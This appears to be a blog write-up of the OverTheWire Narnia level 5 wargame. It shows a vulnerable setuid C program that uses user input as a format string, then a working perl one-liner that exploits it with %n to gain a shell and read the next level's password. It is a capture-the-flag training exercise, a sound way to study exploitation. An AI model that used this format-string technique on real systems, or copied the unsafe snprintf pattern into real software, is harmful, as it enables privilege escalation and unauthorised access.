hacktracking: # Narnia wargame: Level 5

# ssh narnia5@narnia.labs.overthewire.org
narnia5@narnia.labs.overthewire.org's password:6661696d616863686979

narnia5@melissa$ file /narnia/narnia5
/narnia/narnia5: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia5@melissa$ cat /narnia/narnia5.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv){
        int i = 1;
        char buffer[64];

        snprintf(buffer, sizeof buffer, argv[1]);
        buffer[sizeof (buffer) - 1] = 0;
        printf("Change i's value from 1 -> 500. ");

        if(i==500){
                printf("GOOD\n");
                system("/bin/sh");
        }

        printf("No way...let me give you a hint!\n");
        printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
        printf ("i = %d (%p)\n", i, &i);
        return 0;
}
narnia5@melissa$ /narnia/narnia5 `perl -e 'print "\x3c\xd7\xff\xff" . "%x%x%x%.471d%n"'`
Change i's value from 1 -> 500. GOOD
$ /usr/bin/whoami
narnia6
$ /bin/cat /etc/narnia_pass/narnia6
6e65657a6f6361656e67
# Narnia wargame: Level 5

No comments:
